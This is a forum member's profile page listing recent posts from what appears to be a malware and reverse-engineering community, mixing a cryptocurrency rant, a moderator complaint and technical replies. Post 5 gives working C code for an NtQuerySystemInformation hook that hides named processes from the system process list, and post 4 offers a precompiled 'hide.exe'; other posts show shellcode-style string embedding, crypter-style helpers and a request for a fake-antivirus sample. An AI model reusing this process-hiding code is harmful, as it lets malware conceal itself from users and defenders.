bosh

Members
  • Content count

    94
  • Joined

  • Last visited

Community Reputation

1 Neutral

About bosh

  • Rank
    Member
  • Birthday 04/06/1971
  1. EDIT: both pointers have to be of type (void*) memcpy([color=#ff0000][b](void*)((char*)Result->ptrCode + DestNode->dwSize), (void*)SourceNode->ptrCode, [/b][/color]SourceNode->dwSize);
  2. http://www.cuckoosandbox.org/ https://malwr.com/
  3. You shall inform yourself about the monetary system, especially how money is created and who can create it. It is a big dirty game. For very certain reasons the us fed bank is willing to stop this modern development by bringing doubtable arguments against this modern money revolution. Free your minds, Free the people, Inform yourself. http://www.coindesk.com/ https://en.wikipedia.org/wiki/Barnaby_Jack http://www.c-span.org/Live-Video/C-SPAN/
  4. Here you go:unpack and open the "hide.sln" with visual studio c++"/hide/Release/hide.exe" precompiled x86 binary"/hide/x64/Release/hide.exe" precompiled x64 binaryChange build platform: [Alt+F7] -> Configuration Manager (top right corner)Have Fun! hide.zip
  5. i just compiled it in x64 and x86. it both works. Just the function "NtQuerySystemInformation_Hook" needs some overall fixing. This works in x86 and x64. Here you go: NTSTATUS NTAPI NtQuerySystemInformation_Hook( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL ) { PSYSTEM_PROCESSES pSystemProcess; PSYSTEM_PROCESSES pNextSystemProcess; NTSTATUS Result; bool walking = true; Result = xNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength); if (NT_SUCCESS(Result)) switch(SystemInformationClass) { case SystemProcessInformation: pSystemProcess = (PSYSTEM_PROCESSES)SystemInformation; pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta); while(pSystemProcess->NextEntryDelta != 0) { if (CheckString(pNextSystemProcess->ProcessName.Buffer)) { if (pNextSystemProcess->NextEntryDelta==0) { pSystemProcess->NextEntryDelta = 0; break; } else { pSystemProcess->NextEntryDelta += pNextSystemProcess->NextEntryDelta; pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta); continue; } } pSystemProcess = pNextSystemProcess; pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta); } break; } return Result; }
  6. Open "regedit.exe" with an exe file editor and look at the imports section. Open "regedit.exe" with debugger and hook the imported functions to see in real time which win32 api's are called.
  7. Hi, could someone please upload a fakeav sample. for research purpose thanks
  8. Why the fuck did my post get deleted?! What is the reason for this behaviour? some moderator is deleting my post, then posting similar and taking credit for that. the super smart moderator has following options: 1. restore my post 2. delete my other commensts and the "thanks" from the thread 3. delete all my threads + all posts from the forum website + delete my account + you are a total loser!
  9. Looks clean and simple. Thanks. Who is the author?
  10. what is this thread about? what do you want to do?
  11. this is how you deal with strings. example in gcc assembler sytax asm("call .+5+13"); asm(".asciz \"Kernel32.dll\""); asm("pop %eax; push %eax;"); //Push parameters asm("call %P0"::"i"(&GetModuleHandle)); //Call GetModuleHandle for Kernel32.dll this example embeds the string in the program code area. the "call" instruction pushes the absolute address of the string "Kernel32.dll" onto the stack and jumps to the instruction following the string .+5+13 == address of current instruction +18
  12. 0085001F E8 20000000 call 00850044 00850024 5B pop ebx E8 20000000 E8 -> relative call instruction 0x20000000 -> swap -> 00 00 00 20 00 85 00 24 + 00 00 00 20 = 00 85 00 44
  13. start ollydbg and see how the "call" instruction gets translated
  14. CODE:004037BB call ShowMessage is the only relative function call in your assembly and at the same time the only function call that will succeed, when executing this assembly in another address space. all other function calls use absolute addresses.
  15. StringGen.h void NewSeed (); void RandomString(char* szString, int dwLength); int RandomNumber(int iPossibilities); void RandomBytes(char* szString, int dwLength, int iPossibilities); StringGen.cpp #include "StringGen.h" #include "stdlib.h" #include #include void NewSeed () { int iLow; int iHigh; __asm__ (" .byte\t0x60"); asm ("\ rdtsc; \ mov %%eax, %0; \ mov %%edx, %1; \ ":"=m"(iLow),"=m"(iHigh):; __asm__ (" .byte\t0x61"); srand(iLow|iHigh); } void RandomString(char* szString, int dwLength) { memset((void*)szString, 0, dwLength); for(;dwLength > 1; dwLength--) { *szString = 0x61 + rand()%0x1A; szString++; } } int RandomNumber(int iPossibilities) { return rand()%iPossibilities; } void RandomBytes(char* szString, int dwLength, int iPossibilities) { memset((void*)szString, 0, dwLength); for(;dwLength > 0; dwLength--) { *szString = (char)(rand()%iPossibilities); szString++; } } FileAccess.h LPVOID FileToMem(LPCSTR szFileName, DWORD dwPointerToSize); DWORD MemToFile(LPVOID pFileInMem, DWORD dwSizeOfFile, LPCSTR szFilePath); FileAccess.cpp #include LPVOID FileToMem(LPCSTR szFileName, DWORD dwPointerToSize) { HANDLE hFile; DWORD dwRead; DWORD dwSize; LPVOID pBuffer = NULL; hFile = CreateFileA(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL); if (hFile) { dwSize = GetFileSize(hFile, NULL); if (dwPointerToSize) *((DWORD*)dwPointerToSize) = dwSize; if (dwSize > 0) { pBuffer = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); if (pBuffer) { SetFilePointer(hFile, NULL, NULL, FILE_BEGIN); ReadFile(hFile, pBuffer, dwSize, &dwRead, NULL); } } CloseHandle(hFile); } return pBuffer; } DWORD MemToFile(LPVOID pFileInMem, DWORD dwSizeOfFile, LPCSTR szFilePath) { HANDLE hFile; hFile = CreateFileA(szFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL , NULL); if (hFile) { DWORD dwNumOfBytesWritten; if (WriteFile(hFile, pFileInMem, dwSizeOfFile, &dwNumOfBytesWritten, NULL)) { CloseHandle(hFile); return 1; } CloseHandle(hFile); } return 0; }
  • Who's Online   0 Members, 0 Anonymous, 7 Guests (See full list)

    There are no registered users currently online